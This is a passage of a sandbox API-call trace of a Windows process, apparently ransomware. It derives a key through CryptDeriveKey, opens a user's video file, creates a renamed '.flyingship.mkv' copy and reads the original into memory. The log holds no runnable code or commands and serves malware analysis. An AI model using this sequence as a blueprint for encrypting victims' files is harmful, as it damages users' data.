| out: lpMsg=0x87f36c) returned 0 [0197.337] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.337] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.337] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0197.337] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.337] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.337] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0197.338] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.338] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0197.338] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0197.338] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.338] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.338] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0197.338] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0197.338] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0197.338] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.338] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.338] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.338] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.338] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0197.338] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0197.338] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0197.339] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.339] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0197.339] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.339] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.339] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.339] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.339] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0197.339] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.339] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.339] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.339] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0197.339] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.339] CryptHashData (hHash=0x90ae18, pbData=0x8dec18, dwDataLen=0x19, dwFlags=0x1) returned 1 [0197.339] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.339] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.340] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.340] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.340] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0197.340] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0197.340] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0197.340] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.340] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0197.340] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.341] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.341] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.341] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.341] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.341] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.341] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0197.341] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.341] CryptDestroyHash (hHash=0x90ae18) returned 1 [0197.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0197.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0197.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0197.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0197.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0197.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0197.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0197.341] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0197.342] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0197.342] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0197.342] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0197.342] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.342] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0197.342] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0197.342] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0197.342] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.342] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.342] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.342] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0197.342] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0197.342] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0197.342] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0197.342] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0197.342] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\e1y-mggtzczzg\\jyvwvjydk6qkt4.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0197.344] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.344] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0197.344] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0197.344] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0197.344] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0197.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0197.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0197.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0197.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0197.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0197.344] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.344] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0197.344] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0197.344] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0197.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0197.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0197.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0197.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0197.345] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0197.345] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0197.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0197.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0197.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0197.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0197.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0197.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0197.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0197.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0197.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0197.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0197.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0197.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0197.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0197.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0197.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0197.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0197.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0197.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0197.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0197.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0197.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0197.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0197.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0197.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0197.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0197.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0197.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0197.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xd0) returned 0x8c08b0 [0197.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0197.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0197.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0197.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0197.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c08b0 | out: hHeap=0x8a0000) returned 1 [0197.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0197.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0197.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0197.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0197.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0197.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0197.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0197.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0197.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0197.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0197.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0197.347] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\e1y-mggtzczzg")) returned 0x10 [0197.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0197.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0197.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0197.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0197.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0197.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0197.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0197.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0197.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0197.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0197.349] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.flyingship.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\e1y-mggtzczzg\\jyvwvjydk6qkt4.flyingship.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0197.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0197.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0197.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0197.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0197.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0197.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0197.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0197.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0197.368] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0197.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0197.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0197.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0197.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0197.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0197.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0197.369] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0197.369] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0197.369] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0197.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0197.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0197.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0197.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0197.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0197.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0197.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0197.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0197.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0197.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0197.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0197.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0197.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0197.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0197.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0197.370] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0197.370] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x7678, lpOverlapped=0x0) returned 1 [0197.373] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0197.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0197.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0197.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0197.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0197.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7678) returned 0xbea018 